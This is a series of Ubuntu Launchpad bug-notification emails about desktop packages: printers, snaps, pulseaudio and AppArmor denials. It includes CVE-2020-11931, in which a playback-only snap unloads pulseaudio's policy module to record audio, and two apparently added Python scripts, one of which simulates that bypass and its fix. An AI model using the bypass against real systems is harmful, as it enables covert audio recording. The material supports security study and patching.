  May 29 14:37:07 r002pc51 kernel: [15848.739974] audit: type=1400 audit(1590755827.772:829): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/run/user/4515/gvfs-metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="r" denied_mask="r" fsuid=4515 ouid=4515
  May 29 14:37:07 r002pc51 kernel: [15848.740088] audit: type=1400 audit(1590755827.772:830): apparmor="DENIED" operation="unlink" profile="/usr/bin/evince" name="/run/user/4515/gvfs-metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="d" denied_mask="d" fsuid=4515 ouid=4515
[Desktop-packages] [Bug 1721704] Re: Printer settings stuck on loading drivers database
@Till, the boot_id issue is being tracked here:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1872564

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to system-config-printer in Ubuntu.
https://bugs.launchpad.net/bugs/1721704

Title:
  Printer settings stuck on loading drivers database

Status in apparmor package in Ubuntu:
  New
Status in system-config-printer package in Ubuntu:
  Incomplete

Bug description:
  1) Description: Ubuntu Artful Aardvark (development branch) Release: 17.10
  2) ubuntu-settings: Installed: 17.10.17 Candidate: 17.10.17
  3) The printer configuration goes fine and I can print
  4) Printer settings stuck on loading drivers database and finally no drivers list available. Only 'cancel' button active.

  Note: I'm trying to configure a Brother HL-2030 connected to Network through a FritzBox 7940 router. The printer works fine both on Fedora and macOS X systems.

  I opened 'System Settings', then select 'Devices' > 'Printers' > 'Add a Printer'. I entered the router address and the window shows me correctly a 'JetDirect-Printer' on 192.168.178.1. I selected the printer and pressed the 'Add' button, a window 'Select Printer Driver' appears and stuck with 'Loading drivers database...'. After about 2 minutes, stopped loading and remains blank. No drivers selection is available and I can only push the 'Cancel' button.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1721704/+subscriptions
[Desktop-packages] [Bug 1878621] Re: [snap] uim input method does not work
I suggest following/participating in the discussion in the forum topic for snapd/ecosystem updates and use this bug to track chromium-browser's use of those updates.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1878621

Title:
  [snap] uim input method does not work

Status in chromium-browser package in Ubuntu:
  Confirmed

Bug description:
  I use the uim input method, which works fine with non-snap apps, and used to work with the non-snap package of Chromium. In 20.04, the chromium package now becomes a snap, and the uim input method no longer works (rendering the browser useless).

  With some searching I found similar issues with other input methods, some of which have been addressed. It appears that it is now the responsibility of every snap packager to support input methods, and the snap cannot rely upon system-configured methods. So please support UIM.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1878621/+subscriptions
[Desktop-packages] [Bug 1876065] Re: After unplug headphones and plug them again no sound can be heard
Rather than superseding 1:13.99.1-1ubuntu4 in groovy-proposed, I instead based the changes in 1:13.99.1-1ubuntu5 on top of 1:13.99.1-1ubuntu4 to address the CVE that was fixed in https://usn.ubuntu.com/4355-1/.

** Also affects: pulseaudio (Ubuntu Groovy)
   Importance: High
   Assignee: Kai-Heng Feng (kaihengfeng)
   Status: Fix Committed

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1876065

Title:
  After unplug headphones and plug them again no sound can be heard

Status in pulseaudio package in Ubuntu:
  Fix Committed
Status in pulseaudio source package in Focal:
  Fix Committed
Status in pulseaudio source package in Groovy:
  Fix Committed

Bug description:
  * Impact
  Sound isn't automatically redirected to headphones when those are connected to a jack interface

  * Test case
  Disconnect the headsets
  Start your webbrowser/music player/video player and play some sound
  Connect the headsets to the jack interface
  -> the sound should be directly redirected to the plugged headsets

  * Regression potential
  Check that audio routing when connecting/disconnecting devices to the jack entry is working correctly

  After startup with headset plugged in they play sound nicely - no issue. When they are unplugged, the sound is switched to the speaker (laptop) - all good. However, when I plug the headset back there is no sound. I see the app on pavucontrol, the volume is fine - everything looks fine except there is no sound.

  I dumped output of "pactl list" command on startup (headset plugged), after unplugging the headset, and when it is plugged back. From the comparison of these outputs, it looks like the source has got muted after the headset is plugged.

  Source #1
    State: RUNNING
    Name: alsa_input.pci-_00_1f.3.analog-stereo
    Description: Built-in Audio Analog Stereo
    Driver: module-alsa-card.c
    Sample Specification: s16le 2ch 44100Hz
    Channel Map: front-left,front-right
    Owner Module: 7
    Mute: yes

  Attached three outputs:
  headset-in.txt - after startup with headset plugged - all fine.
  headset-out.txt - after unplugged headset - sound through the speaker - all fine.
  headset-back.txt - after plugged headset back - no sound.

  Any help greatly appreciated.
  Regards, Roman

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1876065/+subscriptions
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
Uploaded https://launchpad.net/ubuntu/+source/pulseaudio/1:13.99.1-1ubuntu5 to groovy based on 1:13.99.1-1ubuntu4 from groovy-proposed.

** Changed in: pulseaudio (Ubuntu Groovy)
       Status: In Progress => Fix Committed

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1877102

Title:
  snap policy module can be unloaded, circumventing audio recording restrictions for snaps

Status in pulseaudio package in Ubuntu:
  Fix Committed
Status in pulseaudio source package in Xenial:
  Fix Released
Status in pulseaudio source package in Bionic:
  Fix Released
Status in pulseaudio source package in Eoan:
  Fix Released
Status in pulseaudio source package in Focal:
  Fix Released
Status in pulseaudio source package in Groovy:
  Fix Committed

Bug description:
  This collates information about a security vulnerability discussed in email. It has been assigned CVE-2020-11931.

  Ubuntu's PulseAudio package is shipped with a custom "module-snap-policy" module intended to restrict snap confined clients from recording audio unless they have the "audio-record" plug connected. However, it does not restrict access to the "PA_COMMAND_UNLOAD_MODULE" command. This allows a snap that has only plugged "audio-playback" to request that PulseAudio unload the security policy module, which in turn makes it possible to record audio.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1877102/+subscriptions
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
I'll apply the focal patch to what is in groovy-proposed.

** Changed in: pulseaudio (Ubuntu Groovy)
     Assignee: (unassigned) => Jamie Strandboge (jdstrand)

** Changed in: pulseaudio (Ubuntu Groovy)
       Status: Triaged => In Progress

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1877102

Status in pulseaudio package in Ubuntu:
  In Progress
Status in pulseaudio source package in Xenial:
  Fix Released
Status in pulseaudio source package in Bionic:
  Fix Released
Status in pulseaudio source package in Eoan:
  Fix Released
Status in pulseaudio source package in Focal:
  Fix Released
Status in pulseaudio source package in Groovy:
  In Progress
[Desktop-packages] [Bug 1869819] Re: [SRU] System can't detect external headset in the codec of Conexant
FYI, the upload to bionic-proposed was superseded by https://usn.ubuntu.com/4355-1/. Please rebase your changes on that and reupload.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1869819

Title:
  [SRU] System can't detect external headset in the codec of Conexant

Status in OEM Priority Project:
  Confirmed
Status in OEM Priority Project bionic series:
  New
Status in pulseaudio package in Ubuntu:
  Fix Released
Status in pulseaudio source package in Bionic:
  In Progress
Status in pulseaudio source package in Focal:
  Fix Released

Bug description:
  [Impact]
  In some HP devices, there are two audio jacks (one headset and one headphone) in the audio interface which is using the codec of Conexant, and apparently it's not working, the system can't detect the headset in current codec.

  [Test Case]
  1. Insert 4 rings (3 stripes) headset into front audio port (headset icon)
  2. Check System Setting->Sound->Output

  [Expected result]
  Can detect external headset

  [Actual result]
  Only shows internal speaker. External headset microphone was detected. Another front audio port (earphone icon) works fine.

  [Regression Potential]
  Low.

  [Failure rate]
  100%

  [Additional information]
  system-product-name: HP EliteDesk 800 G5 SFF
  CPU: Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (8x)
  GPU: 00:02.0 VGA compatible controller [0300]: Intel Corporation Device [8086:3e98] (rev 02)
  OS-version: 18.04
  kernel-version: 4.15.0-1065-oem
  pulseaudio-version: 1:11.1-1ubuntu7.2

  Upstream issue: https://gitlab.freedesktop.org/pulseaudio/pulseaudio/-/merge_requests/272
  Ubuntu-Focal-Source: https://code.launchpad.net/~hugh712/ubuntu/+source/pulseaudio/+git/pulseaudio/+ref/focal-1869819
  PPA: https://launchpad.net/~hugh712/+archive/ubuntu/sru-1869819

To manage notifications about this bug go to:
https://bugs.launchpad.net/oem-priority/+bug/1869819/+subscriptions
[Desktop-packages] [Bug 1876065] Re: After unplug headphones and plug them again no sound can be heard
FYI, the upload to focal-proposed was superseded by https://usn.ubuntu.com/4355-1/. Please rebase your changes on that and reupload.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1876065

Status in pulseaudio package in Ubuntu:
  Fix Committed
Status in pulseaudio source package in Focal:
  Fix Committed
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
** Changed in: pulseaudio (Ubuntu Groovy)
   Importance: High => Medium

** Changed in: pulseaudio (Ubuntu Focal)
   Importance: Undecided => Medium

** Changed in: pulseaudio (Ubuntu Eoan)
   Importance: Undecided => Medium

** Changed in: pulseaudio (Ubuntu Bionic)
   Importance: Undecided => Medium

** Changed in: pulseaudio (Ubuntu Xenial)
   Importance: Undecided => Medium

** Information type changed from Private Security to Public Security

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1877102

Status in pulseaudio package in Ubuntu:
  Triaged
Status in pulseaudio source package in Xenial:
  Fix Released
Status in pulseaudio source package in Bionic:
  Fix Released
Status in pulseaudio source package in Eoan:
  Fix Released
Status in pulseaudio source package in Focal:
  Fix Released
Status in pulseaudio source package in Groovy:
  Triaged
[Desktop-packages] [Bug 1873764] Re: CUPS Apparmor Error opening /proc/sys/kernel/random/boot_id
*** This bug is a duplicate of bug 1872564 ***
https://bugs.launchpad.net/bugs/1872564

This is a dupe of https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1872564 which, AIUI, the server team will be performing an SRU for.

** This bug has been marked a duplicate of bug 1872564
   /proc/sys/kernel/random/boot_id rule missing from abstractions/nameservice

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to cups in Ubuntu.
https://bugs.launchpad.net/bugs/1873764

Title:
  CUPS Apparmor Error opening /proc/sys/kernel/random/boot_id

Status in cups package in Ubuntu:
  Confirmed

Bug description:
  I noted the following messages on a just installed Ubuntu Focal:

  $ dmesg | grep cups
  [ 1769.505132] audit: type=1400 audit(1587372138.575:3011): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15230 comm="cups-browsed" capability=23 capname="sys_nice"
  [ 1776.623181] audit: type=1400 audit(1587372145.693:3012): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15510 comm="cups-browsed" capability=23 capname="sys_nice"
  [ 2040.426033] audit: type=1400 audit(1587372409.494:3013): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2040.426044] audit: type=1400 audit(1587372409.494:3014): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2040.426074] audit: type=1400 audit(1587372409.494:3015): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2040.426092] audit: type=1400 audit(1587372409.494:3016): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2040.426106] audit: type=1400 audit(1587372409.494:3017): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404914] audit: type=1400 audit(1587372410.473:3018): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404920] audit: type=1400 audit(1587372410.473:3019): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404926] audit: type=1400 audit(1587372410.473:3020): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404953] audit: type=1400 audit(1587372410.473:3021): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2041.404963] audit: type=1400 audit(1587372410.473:3022): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925327] audit: type=1400 audit(1587372440.994:3028): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925330] audit: type=1400 audit(1587372440.994:3029): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925337] audit: type=1400 audit(1587372440.994:3030): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925382] audit: type=1400 audit(1587372440.994:3031): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
  [ 2071.925391] audit: type=1400 audit(1587372440.994:3032): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0

  It happened after installing Brother DCPL3550CDW Linux drivers.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: cups-daemon 2.3.1-9ubuntu1
  ProcVersionSignature: Ubuntu 5.4.0-25.29-lowlatency 5.4.30
  Uname: Linux 5.4.0-25-lowlatency x86_64
  NonfreeKer
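Both the evince report (bug 1881294, earlier on this page) and the cupsd report above quote raw type=1400 audit records and leave the reader to work out which profile rule each one is asking for. The script below is an added example written for this page; it is not code from either bug report and not part of apparmor-utils (aa-logprof does this job properly on a real system). It parses records in the syslog and dmesg shapes quoted above, collapses the repeated boot_id denials into one candidate, and turns a "capable" denial into a capability rule. The sample lines are constructed to match the quoted format, and the choice to prepend `owner` only when the denied process owns the object and is not root is this script's assumption, not something either bug states.

```python
"""Triage AppArmor DENIED audit lines into candidate profile rules.

Added example for this page; not code from the bug reports, not apparmor-utils.
Sample records are constructed to match the syslog/dmesg lines quoted above.
"""
import re
from collections import defaultdict

# Constructed sample: two evince denials, the repeated cupsd boot_id denial,
# one cups-browsed capability denial, and one line that is not an audit record.
SAMPLE_LOG = """\
May 29 14:37:07 r002pc51 kernel: [15848.736916] audit: type=1400 audit(1590755827.768:827): apparmor="DENIED" operation="file_lock" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.cache/event-sound-cache.tdb" pid=34988 comm="evince" requested_mask="k" denied_mask="k" fsuid=4515 ouid=4515
May 29 14:37:07 r002pc51 kernel: [15848.739974] audit: type=1400 audit(1590755827.772:829): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/run/user/4515/gvfs-metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="r" denied_mask="r" fsuid=4515 ouid=4515
May 29 14:37:07 r002pc51 kernel: [15848.740088] audit: type=1400 audit(1590755827.772:830): apparmor="DENIED" operation="unlink" profile="/usr/bin/evince" name="/run/user/4515/gvfs-metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="d" denied_mask="d" fsuid=4515 ouid=4515
[ 2040.426033] audit: type=1400 audit(1587372409.494:3013): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 2040.426044] audit: type=1400 audit(1587372409.494:3014): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0
[ 1769.505132] audit: type=1400 audit(1587372138.575:3011): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15230 comm="cups-browsed" capability=23 capname="sys_nice"
Apr 20 10:42:18 host kernel: unrelated line without an apparmor record
"""

# key="quoted value" or key=bare_value, as the audit subsystem emits them
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_audit_line(line):
    """Return the key/value fields of one AppArmor audit record, or None."""
    if 'apparmor="' not in line:
        return None
    fields = {}
    for key, quoted, bare in FIELD_RE.findall(line):
        fields[key] = quoted if quoted else bare
    return fields


def candidate_rule(ev):
    """Map one denial to the AppArmor rule that would permit it.

    denied_mask already uses profile-language permission letters (r, w, k,
    l, d, ...). 'owner' is prepended when the process's fsuid owns the
    object and is not root; that is this script's assumption about what a
    reviewer usually wants, not a rule taken from either bug.
    """
    if ev.get("operation") == "capable":
        return f"capability {ev['capname']},"
    if "name" not in ev:
        return f"# review manually: operation={ev.get('operation')}"
    mask = ev.get("denied_mask") or ev.get("requested_mask", "")
    owner = ev.get("fsuid") == ev.get("ouid") and ev.get("fsuid") != "0"
    return f"{'owner ' if owner else ''}{ev['name']} {mask},"


def summarize(log_text):
    """Group DENIED records by profile -> sorted, de-duplicated candidate rules."""
    rules = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_audit_line(line)
        if ev and ev.get("apparmor") == "DENIED":
            rules[ev["profile"]].add(candidate_rule(ev))
    return {profile: sorted(r) for profile, r in rules.items()}


if __name__ == "__main__":
    for profile, rules in summarize(SAMPLE_LOG).items():
        print(f"# {profile}")
        for rule in rules:
            print(f"  {rule}")
```

A candidate rule is a starting point for review, not a decision: the cupsd output here is a single `/proc/sys/kernel/random/boot_id r,` line, and the fix the duplicate bug tracks put that rule into abstractions/nameservice rather than into the cupsd profile itself. Run it against `journalctl -k` or `/var/log/syslog` on a real host by replacing SAMPLE_LOG with the file contents.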
[Desktop-packages] [Bug 1869819] Re: [SRU] System can't detect external headset in the codec of Conexant
FYI, there is a pending update that will go out either tomorrow or early next week. Please base your next upload on this update.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1869819

Status in OEM Priority Project:
  Confirmed
Status in OEM Priority Project bionic series:
  New
Status in pulseaudio package in Ubuntu:
  Fix Released
Status in pulseaudio source package in Bionic:
  In Progress
Status in pulseaudio source package in Focal:
  Fix Released
[Desktop-packages] [Bug 1776873] Re: Whitelisted allowedURLschemes breaks some desktop apps
FYI, in recent PR discussions[1] we've acknowledged that we should make it easier to allow different URL schemes into snapd and I laid out some criteria/process ideas on how to make this happen, and I applied that criteria to the zoommtg PR and it was merged quickly. I discussed with Samuele that we could make this go even faster if we codify things for reviewers as well as some other implementation details.

In short, today, the snapd team is in a position to be more responsive with adding new url schemes and we'll make it so we can go even faster. For people who want snapd to support new URL schemes I suggest doing one of:

* if you are able, submitting a PR to snapd[2] for the URL schemes you are interested in
* filing a new bug[3] for the requested url scheme (eg, "add support for url scheme ...") and then someone can take a look

Thanks

[1] https://github.com/snapcore/snapd/pull/7731#pullrequestreview-362900171
[2] https://github.com/snapcore/snapd
[3] https://bugs.launchpad.net/snapd/+filebug

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu.
https://bugs.launchpad.net/bugs/1776873

Title:
  Whitelisted allowedURLschemes breaks some desktop apps

Status in snapd:
  Triaged
Status in chromium-browser package in Ubuntu:
  Confirmed

Bug description:
  https://github.com/snapcore/snapd/blob/7952972d4897e085030b288e44dc98b824f6723a/userd/launcher.go#L55

  snapd has a hard-coded list of allowed URL schemes. Currently that is limited to "http", "https", "mailto", "snap". We have a number of applications in the store which are trying to use protocol handlers outside this scope and break when that's not possible.

  e.g.
  Telegram Desktop: tg:/
  Github Desktop: git:/
  IRCCloud Desktop: irc:/

  These are the ones I know of, others may also be affected. Can we please at least expand the list to those that we know of, and perhaps research other popular protocol handlers? Ideally we wouldn't have a whitelist, because this delays our ability to land new applications with as-yet unknown url schemes.

To manage notifications about this bug go to:
https://bugs.launchpad.net/snapd/+bug/1776873/+subscriptions
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
I confirmed that https://people.canonical.com/~ubuntu-archive/proposed-migration/xenial/update_excuses.html shows no autopkgtest regression for xenial. I also ran through the TEST CASE for this bug and xenial passed. Marking verification-done-xenial

** Tags removed: verification-failed-xenial
** Tags added: verification-done-xenial

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title:
  please enable snap mediation support

Status in pulseaudio package in Ubuntu:
  Fix Released
Status in pulseaudio source package in Xenial:
  Fix Committed
Status in pulseaudio source package in Bionic:
  Fix Committed

Bug description:
  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

  To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated with a patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface-deprecation/13418).

  The patch to pulseaudio consists of adding a module, enabling it in default.pa and then, when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected.

  Adjusting pulseaudio in this manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU.

  [Test Case]
  IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy

  For unconfined applications:
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes"   # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes

  For confined, non-snap applications:
  $ sudo apt-get install evince
  $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes
  $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes"   # ctrl-c to stop recording
  ^Cyes
  $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes"
  yes

  For classic snaps:
  $ sudo snap install test-snapd-classic-confinement --classic
  $ snap run --shell test-snapd-classic-confinement
  $ cat /proc/self/attr/current   # verify we are classic confined
  snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain)
  $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes"
  yes
  $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes"   # ctrl-c to stop recording
  ^Cyes
  $ paplay /tmp/out.wav && echo "yes"
  yes
  $ exit   # out of snap run --shell

  For strict snaps with pulseaudio:
  $ sudo snap install test-snapd-pulseaudio --edge
  $ sudo snap connect test-snapd-pulseaudio:pulseaudio
  $ snap connections test-snapd-pulseaudio
  Interface   Plug                              Slot         Notes
  pulseaudio  test-snapd-pulseaudio:pulseaudio  :pulseaudio  -
  $ test-snapd-pulseaudio.play --help   # ensure SNAP dirs are created
  ...
  $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-pulseaudio/common/
  $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes
  xcb_connection_has_error() returned true
  yes
  (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested)
  $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes   # should pass
  ...
  ^Cyes
  $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes
  ...
  yes

  For strict snaps with audio-playback/audio-record:
  $ sudo snap refresh core --candidate   # make sure have 2.41. 'install' on 16.04
  $ sudo snap install test
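The bug description above spells out the mediation rule (a client whose AppArmor label starts with 'snap.' may record only if snapd says the snap is classic or has the pulseaudio or audio-record interface connected), and bug 1877102 earlier on this page (CVE-2020-11931) shows what goes wrong when that rule is enforced by a loadable module whose unload command the same clients are allowed to send. The following is an added example written for this page that models both; it is not PulseAudio's module-snap-policy code. snapd's control-socket answers are replaced by a constructed in-memory table, the command names are illustrative rather than the PA_COMMAND_* wire values, and the snap names are made up. It also refuses load_module for snap clients, which goes one step beyond the unload case the bug text describes.

```python
"""Model of snap record mediation and the CVE-2020-11931 unload bypass.

Added example for this page, not PulseAudio's module-snap-policy code.
snapd is replaced by a constructed table, command names are illustrative
(not PA_COMMAND_* wire values) and the snap names are made up.
"""
from dataclasses import dataclass, field

PLAY, RECORD, LOAD_MODULE, UNLOAD_MODULE = "play", "record", "load_module", "unload_module"
MODULE_MGMT = {LOAD_MODULE, UNLOAD_MODULE}


@dataclass
class SnapInfo:
    classic: bool = False
    connected: set = field(default_factory=set)  # names of connected plugs


# Constructed stand-in for what snapd would answer over its control socket.
SNAPD = {
    "test-snapd-pulseaudio": SnapInfo(connected={"pulseaudio"}),
    "player-only": SnapInfo(connected={"audio-playback"}),
    "recorder": SnapInfo(connected={"audio-playback", "audio-record"}),
    "classic-app": SnapInfo(classic=True),
}


def snap_name(label):
    """'snap.<name>.<app>' -> '<name>'; None for '/usr/bin/evince', 'unconfined', etc."""
    parts = label.split(".")
    return parts[1] if len(parts) >= 3 and parts[0] == "snap" else None


def record_allowed(label):
    """The rule from the bug: non-snaps always; snaps only if classic or if the
    pulseaudio or audio-record interface is connected. Unknown snaps fail closed."""
    name = snap_name(label)
    if name is None:
        return True
    info = SNAPD.get(name)
    if info is None:
        return False
    return info.classic or bool(info.connected & {"pulseaudio", "audio-record"})


class Server:
    """Minimal request dispatcher whose policy hook lives in an unloadable module."""

    def __init__(self, hardened):
        self.hardened = hardened      # False: only RECORD is gated (the bug)
        self.policy_loaded = True

    def handle(self, label, command):
        """Return 'ok' or 'denied' for one client request."""
        if self.policy_loaded:
            if command == RECORD and not record_allowed(label):
                return "denied"
            # The fix: a snap-confined client may not manage modules at all,
            # otherwise it can unload the very module doing these checks.
            if self.hardened and command in MODULE_MGMT and snap_name(label):
                return "denied"
        if command == UNLOAD_MODULE:
            self.policy_loaded = False  # policy module gone; nothing gates RECORD now
        return "ok"


def bypass_attempt(hardened):
    """A snap with only audio-playback: record, unload the policy, record again."""
    srv = Server(hardened)
    label = "snap.player-only.player"
    return [srv.handle(label, cmd) for cmd in (RECORD, UNLOAD_MODULE, RECORD)]


if __name__ == "__main__":
    print("vulnerable:", bypass_attempt(hardened=False))
    print("hardened:  ", bypass_attempt(hardened=True))
```

In this model the unconfined session (the user's own `pactl unload-module`) can still unload modules in both modes; the hardening only has to refuse module management to clients whose label starts with 'snap.', since those are the ones whose access the module exists to limit. The same label check is what the [Test Case] above exercises with `cat /proc/self/attr/current` inside `snap run --shell`.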
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
I confirmed that https://people.canonical.com/~ubuntu-archive/proposed-migration/bionic/update_excuses.html shows no autopkgtest regression for bionic. I also ran through the TEST CASE for this bug and bionic passed. Marking verification-done-bionic.

** Tags removed: verification-failed verification-failed-bionic
** Tags added: verification-done-bionic
** Tags added: verification-done

-- 
You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1781428

Title:
  please enable snap mediation support

Status in pulseaudio package in Ubuntu:
  Fix Released
Status in pulseaudio source package in Xenial:
  Fix Committed
Status in pulseaudio source package in Bionic:
  Fix Committed

Bug description:
  [Impact]
  Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected.

